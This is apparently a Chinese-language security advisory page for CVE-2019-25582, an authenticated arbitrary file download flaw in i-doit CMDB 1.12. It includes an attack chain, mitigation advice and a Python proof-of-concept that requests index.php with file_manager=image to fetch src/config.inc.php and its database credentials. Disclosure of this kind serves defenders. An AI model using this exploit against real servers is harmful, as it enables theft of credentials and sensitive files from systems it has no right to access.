CVE-2019-25582 CVSS 6.5 中危

CVE-2019-25582 i-doit CMDB任意文件下载漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25582

漏洞类型

任意文件下载

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

i-doit CMDB

漏洞概述

i-doit CMDB 1.12版本存在任意文件下载漏洞。由于系统对文件路径参数校验不严，已认证攻击者可利用该漏洞，通过构造特定GET请求操纵index.php中的file参数，配合file_manager=image功能，从服务器下载任意敏感文件（如配置文件），导致严重信息泄露。

技术细节

该漏洞的核心成因在于 i-doit CMDB 在 index.php 文件处理逻辑中，未对 file 参数实施有效的路径安全检查。当攻击者设置 file_manager=image 时，后端代码直接将其视为合法的文件读取操作。由于缺乏对目录遍历字符（如 ../）的过滤机制，且系统仅要求低权限认证（PR:L），攻击者能够轻易突破 Web 根目录限制。通过构造包含恶意路径的 GET 请求，攻击者可读取并下载服务器上的任意敏感文件，例如存放数据库凭证的 src/config.inc.php，从而获取系统控制权或导致严重的数据泄露。

攻击链分析

STEP 1

Reconnaissance

Identify a target running i-doit CMDB version 1.12.

STEP 2

Authentication

Obtain low-privileged user credentials for the target application.

STEP 3

Exploitation

Send a crafted GET request to index.php with parameters file_manager=image and file=../../[sensitive_file_path] to read arbitrary files.

STEP 4

Data Exfiltration

Extract the contents of the downloaded file (e.g., src/config.inc.php) to obtain database credentials or other sensitive data.

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_url = "http://target-ip/index.php"

# Vulnerable parameters to exploit arbitrary file download
# The 'file_manager' must be set to 'image' to trigger the vulnerable function
# The 'file' parameter specifies the path to the sensitive file
params = {
    "file_manager": "image",
    "file": "src/config.inc.php"  # Attempting to read the configuration file
}

try:
    # Sending the GET request
    # Note: Authentication may be required (Low Privileges)
    response = requests.get(target_url, params=params)

    # Checking the response
    if response.status_code == 200 and "config" in response.text.lower():
        print("[+] Exploit successful! Sensitive file content retrieved:")
        print(response.text)
    else:
        print("[-] Exploit failed or file not found.")
except Exception as e:
    print(f"Error: {e}")

影响范围

i-doit CMDB 1.12

防御指南

临时缓解措施

如果不能立即升级，建议在WAF（Web应用防火墙）中添加规则，拦截包含file_manager=image及路径遍历字符（如../）的恶意请求。同时，严格限制Web目录的文件访问权限，防止Web进程读取非Web目录下的敏感配置文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表